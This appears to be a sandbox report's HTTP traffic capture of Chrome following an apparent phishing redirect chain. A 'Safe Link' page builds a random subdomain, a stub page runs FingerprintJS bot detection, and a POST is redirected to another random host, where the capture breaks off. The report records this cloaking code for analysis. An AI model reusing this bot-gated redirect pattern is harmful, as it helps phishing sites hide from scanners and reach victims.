                                                X-Cache: Hit from cloudfront
                                                Via: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: BAH53-C1
                                                Alt-Svc: h3=":443"; ma=86400
                                                X-Amz-Cf-Id: 9EL-rz9LqWqgUkwB4LLXiwC3L8MHxlxKzycPiHzQrpKcGpneb66S-g==
                                                Age: 170310
                                                2024-12-23 14:21:14 UTC409INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 53 61 66 65 20 4c 69 6e 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 6c 65 74 20 61 72 72 20 3d 20 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 36 29 3b 0a 20 20 63 72 79 70 74 6f 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 61 72 72 29 3b 0a 20 20 6c 65 74 20 73 75 62 20 3d 20 41 72 72 61 79 2e 66 72 6f 6d 28 61 72 72 2c 20 62 20 3d 3e 20 28 62 20 25 20 33 36 29 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 29 2e 6a 6f 69 6e 28 27 27 29 3b 0a 20 20 6c 65 74 20 64 6f 6d 61 69 6e 20 3d 20 22 61 72 2e 79 6f 75 72 74 61 73 6b 66 6f 72 63 65 2e 63 6f 6d 22 3b 0a 09
                                                Data Ascii: <!DOCTYPE html><html><head><meta charset="UTF-8"><title>Safe Link</title><script> let arr = new Uint8Array(6); crypto.getRandomValues(arr); let sub = Array.from(arr, b => (b % 36).toString(36)).join(''); let domain = "ar.yourtaskforce.com";


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549725135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:17 UTC710OUTGET / HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: document
                                                Referer: https://main.d3qs0n0oqv3g7o.amplifyapp.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:18 UTC373INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:18 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:18 UTC242INData Raw: 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 3f 5f 6a 73 3d 5f 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: e7<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Just a moment...</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <script src="?_js=_1"></script></head><body></body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549726135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:18 UTC546OUTGET /?_js=_1 HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:18 UTC378INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:18 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
                                                2024-12-23 14:21:18 UTC941INData Raw: 33 61 31 0d 0a 63 6f 6e 73 74 20 63 75 72 72 65 6e 74 55 52 4c 20 3d 20 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0a 63 6f 6e 73 74 20 62 61 73 65 55 52 4c 20 3d 20 60 24 7b 63 75 72 72 65 6e 74 55 52 4c 2e 6f 72 69 67 69 6e 7d 24 7b 63 75 72 72 65 6e 74 55 52 4c 2e 70 61 74 68 6e 61 6d 65 7d 60 3b 0a 63 6f 6e 73 74 20 6e 65 77 55 52 4c 20 3d 20 60 24 7b 62 61 73 65 55 52 4c 7d 3f 5f 6a 64 3d 62 6f 74 64 60 3b 0a 69 6d 70 6f 72 74 28 6e 65 77 55 52 4c 29 2e 74 68 65 6e 28 28 5f 62 29 20 3d 3e 20 5f 62 2e 6c 6f 61 64 28 29 29 2e 74 68 65 6e 28 28 5f 62 29 20 3d 3e 20 5f 62 2e 64 65 74 65 63 74 28 29 29 0a 2e 74 68 65 6e 28 28 5f 72 29 20 3d 3e 20 7b 0a 20 20 20 20 6c 65 74 20 76 61 6c 75 65 3b 0a 20 20 20 20
                                                Data Ascii: 3a1const currentURL = new URL(window.location.href);const baseURL = `${currentURL.origin}${currentURL.pathname}`;const newURL = `${baseURL}?_jd=botd`;import(newURL).then((_b) => _b.load()).then((_b) => _b.detect()).then((_r) => { let value;


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549734135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:20 UTC597OUTGET /?_jd=botd HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Origin: https://6p205g.ar.yourtaskforce.com
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://6p205g.ar.yourtaskforce.com/?_js=_1
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:20 UTC378INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:20 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
                                                2024-12-23 14:21:20 UTC7814INData Raw: 31 66 32 30 0d 0a 2f 2a 2a 0a 20 2a 20 46 69 6e 67 65 72 70 72 69 6e 74 20 42 6f 74 44 20 76 31 2e 39 2e 31 20 2d 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 69 6e 67 65 72 70 72 69 6e 74 4a 53 2c 20 49 6e 63 2c 20 32 30 32 34 20 28 68 74 74 70 73 3a 2f 2f 66 69 6e 67 65 72 70 72 69 6e 74 2e 63 6f 6d 29 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 29 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74
                                                Data Ascii: 1f20/** * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com) * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license. */var e=function(n,t){return e=Object.setPrototypeOf||{__prot
                                                2024-12-23 14:21:20 UTC160INData Raw: 73 43 61 70 74 75 72 65 4d 65 64 69 61 53 74 72 65 61 6d 22 69 6e 20 74 5d 29 3e 3d 34 3f 22 67 65 63 6b 6f 22 3a 22 75 6e 6b 6e 6f 77 6e 22 7d 76 61 72 20 70 3d 7b 61 6e 64 72 6f 69 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6d 28 29 2c 6e 3d 22 63 68 72 6f 6d 69 75 6d 22 3d 3d 3d 65 2c 74 3d 22 67 65 63 6b 6f 22 3d 3d 3d 65 3b 69 66 28 21 6e 26 26 21 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 72 3d 77 69 6e 64 6f 77 3b 72 65 74 75 72 6e 20 76 28 5b 22 6f 6e
                                                Data Ascii: sCaptureMediaStream"in t])>=4?"gecko":"unknown"}var p={android:function(){var e=m(),n="chromium"===e,t="gecko"===e;if(!n&&!t)return!1;var r=window;return v(["on
                                                2024-12-23 14:21:20 UTC2INData Raw: 0d 0a
                                                Data Ascii:
                                                2024-12-23 14:21:20 UTC7241INData Raw: 31 63 33 63 0d 0a 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 69 6e 20 72 2c 22 6f 72 69 65 6e 74 61 74 69 6f 6e 22 69 6e 20 72 2c 6e 26 26 21 28 22 53 68 61 72 65 64 57 6f 72 6b 65 72 22 69 6e 20 72 29 2c 74 26 26 2f 61 6e 64 72 6f 69 64 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 56 65 72 73 69 6f 6e 29 5d 29 3e 3d 32 7d 2c 62 72 6f 77 73 65 72 4b 69 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 6e 3d 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 63 28 6e 2c 22 65 64 67 2f 22 29 3f 22 65 64 67 65 22 3a 63 28 6e 2c 22 74 72 69 64 65 6e 74 22
                                                Data Ascii: 1c3corientationchange"in r,"orientation"in r,n&&!("SharedWorker"in r),t&&/android/i.test(navigator.appVersion)])>=2},browserKind:function(){var e,n=null===(e=navigator.userAgent)||void 0===e?void 0:e.toLowerCase();return c(n,"edg/")?"edge":c(n,"trident"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549735135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:20 UTC610OUTGET /favicon.ico HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:20 UTC373INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:20 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:20 UTC242INData Raw: 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 3f 5f 6a 73 3d 5f 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: e7<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Just a moment...</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <script src="?_js=_1"></script></head><body></body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549737135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:20 UTC358OUTGET /?_js=_1 HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:20 UTC378INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:20 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
                                                2024-12-23 14:21:20 UTC941INData Raw: 33 61 31 0d 0a 63 6f 6e 73 74 20 63 75 72 72 65 6e 74 55 52 4c 20 3d 20 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0a 63 6f 6e 73 74 20 62 61 73 65 55 52 4c 20 3d 20 60 24 7b 63 75 72 72 65 6e 74 55 52 4c 2e 6f 72 69 67 69 6e 7d 24 7b 63 75 72 72 65 6e 74 55 52 4c 2e 70 61 74 68 6e 61 6d 65 7d 60 3b 0a 63 6f 6e 73 74 20 6e 65 77 55 52 4c 20 3d 20 60 24 7b 62 61 73 65 55 52 4c 7d 3f 5f 6a 64 3d 62 6f 74 64 60 3b 0a 69 6d 70 6f 72 74 28 6e 65 77 55 52 4c 29 2e 74 68 65 6e 28 28 5f 62 29 20 3d 3e 20 5f 62 2e 6c 6f 61 64 28 29 29 2e 74 68 65 6e 28 28 5f 62 29 20 3d 3e 20 5f 62 2e 64 65 74 65 63 74 28 29 29 0a 2e 74 68 65 6e 28 28 5f 72 29 20 3d 3e 20 7b 0a 20 20 20 20 6c 65 74 20 76 61 6c 75 65 3b 0a 20 20 20 20
                                                Data Ascii: 3a1const currentURL = new URL(window.location.href);const baseURL = `${currentURL.origin}${currentURL.pathname}`;const newURL = `${baseURL}?_jd=botd`;import(newURL).then((_b) => _b.load()).then((_b) => _b.detect()).then((_r) => { let value;


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.549743135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:22 UTC362OUTGET /favicon.ico HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:22 UTC373INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:22 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                2024-12-23 14:21:22 UTC242INData Raw: 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 3f 5f 6a 73 3d 5f 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: e7<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Just a moment...</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <script src="?_js=_1"></script></head><body></body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.549744135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:22 UTC360OUTGET /?_jd=botd HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:22 UTC378INHTTP/1.1 200 OK
                                                Date: Mon, 23 Dec 2024 14:21:22 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Transfer-Encoding: chunked
                                                Content-Type: text/javascript;charset=UTF-8
                                                2024-12-23 14:21:22 UTC7814INData Raw: 31 66 32 30 0d 0a 2f 2a 2a 0a 20 2a 20 46 69 6e 67 65 72 70 72 69 6e 74 20 42 6f 74 44 20 76 31 2e 39 2e 31 20 2d 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 69 6e 67 65 72 70 72 69 6e 74 4a 53 2c 20 49 6e 63 2c 20 32 30 32 34 20 28 68 74 74 70 73 3a 2f 2f 66 69 6e 67 65 72 70 72 69 6e 74 2e 63 6f 6d 29 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 28 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 29 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74
                                                Data Ascii: 1f20/** * Fingerprint BotD v1.9.1 - Copyright (c) FingerprintJS, Inc, 2024 (https://fingerprint.com) * Licensed under the MIT (http://www.opensource.org/licenses/mit-license.php) license. */var e=function(n,t){return e=Object.setPrototypeOf||{__prot
                                                2024-12-23 14:21:22 UTC160INData Raw: 73 43 61 70 74 75 72 65 4d 65 64 69 61 53 74 72 65 61 6d 22 69 6e 20 74 5d 29 3e 3d 34 3f 22 67 65 63 6b 6f 22 3a 22 75 6e 6b 6e 6f 77 6e 22 7d 76 61 72 20 70 3d 7b 61 6e 64 72 6f 69 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6d 28 29 2c 6e 3d 22 63 68 72 6f 6d 69 75 6d 22 3d 3d 3d 65 2c 74 3d 22 67 65 63 6b 6f 22 3d 3d 3d 65 3b 69 66 28 21 6e 26 26 21 74 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 72 3d 77 69 6e 64 6f 77 3b 72 65 74 75 72 6e 20 76 28 5b 22 6f 6e
                                                Data Ascii: sCaptureMediaStream"in t])>=4?"gecko":"unknown"}var p={android:function(){var e=m(),n="chromium"===e,t="gecko"===e;if(!n&&!t)return!1;var r=window;return v(["on
                                                2024-12-23 14:21:22 UTC2INData Raw: 0d 0a
                                                Data Ascii:
                                                2024-12-23 14:21:22 UTC7241INData Raw: 31 63 33 63 0d 0a 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 69 6e 20 72 2c 22 6f 72 69 65 6e 74 61 74 69 6f 6e 22 69 6e 20 72 2c 6e 26 26 21 28 22 53 68 61 72 65 64 57 6f 72 6b 65 72 22 69 6e 20 72 29 2c 74 26 26 2f 61 6e 64 72 6f 69 64 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 56 65 72 73 69 6f 6e 29 5d 29 3e 3d 32 7d 2c 62 72 6f 77 73 65 72 4b 69 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 6e 3d 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 63 28 6e 2c 22 65 64 67 2f 22 29 3f 22 65 64 67 65 22 3a 63 28 6e 2c 22 74 72 69 64 65 6e 74 22
                                                Data Ascii: 1c3corientationchange"in r,"orientation"in r,n&&!("SharedWorker"in r),t&&/android/i.test(navigator.appVersion)])>=2},browserKind:function(){var e,n=null===(e=navigator.userAgent)||void 0===e?void 0:e.toLowerCase();return c(n,"edg/")?"edge":c(n,"trident"


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.549745135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:22 UTC864OUTPOST / HTTP/1.1
                                                Host: 6p205g.ar.yourtaskforce.com
                                                Connection: keep-alive
                                                Content-Length: 6
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                Origin: https://6p205g.ar.yourtaskforce.com
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                Referer: https://6p205g.ar.yourtaskforce.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-12-23 14:21:22 UTC6OUTData Raw: 5f 72 3d 25 32 46
                                                Data Ascii: _r=%2F
                                                2024-12-23 14:21:22 UTC406INHTTP/1.1 307 Temporary Redirect
                                                Date: Mon, 23 Dec 2024 14:21:22 GMT
                                                Server: Apache
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                Referrer-Policy: no-referrer-when-downgrade
                                                Permissions-Policy: geolocation=(), microphone=(), camera=()
                                                Upgrade: h2
                                                Connection: Upgrade, close
                                                location: https://5mzcue1v.doc.checkiteasy.com/
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.549753135.225.111.1904434372C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-23 14:21:24 UTC833OUTPOST / HTTP/1.1
                                                Host: 5mzcue1v.doc.checkiteasy.com
                                                Connection: keep-alive
                                                Content-Length: 6
                                                Cache-Control: max-age=0
                                                Upgrade-Insecure-Requests: 1
                                                Origin: null
                                                Content-Type: application/x-www-form-urlencoded
